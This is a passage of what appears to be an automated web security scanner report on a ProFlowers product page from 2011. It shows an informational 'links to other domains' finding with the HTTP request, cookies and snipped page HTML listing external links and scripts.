...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including The Ultimate Office Plant from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl02_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?viewpos=6&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." 
style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." 